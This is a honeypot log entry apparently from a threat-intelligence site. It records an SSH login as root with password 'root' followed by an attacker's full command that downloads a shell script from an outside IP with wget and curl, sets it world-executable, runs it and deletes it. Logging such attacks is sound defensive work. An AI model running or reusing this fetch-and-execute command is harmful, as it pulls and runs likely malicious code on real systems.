Time | 2024/06/02, 14:28:37 (GMT) |
Transaction ID | IMJLXKYFMPTNIS8O |
Service | ssh |
Location | US (United States) |
Attacker | 164.92.108.184 |
Classification | Web script execution |
Harm Potential | High |
164.92.108.184 client username 'root' and password 'root' entered 164.92.108.184 client command : 'wget http://193.233.202.150/8UsA.sh; curl -O http://193.233.202.150/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf 8UsA.sh v3'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |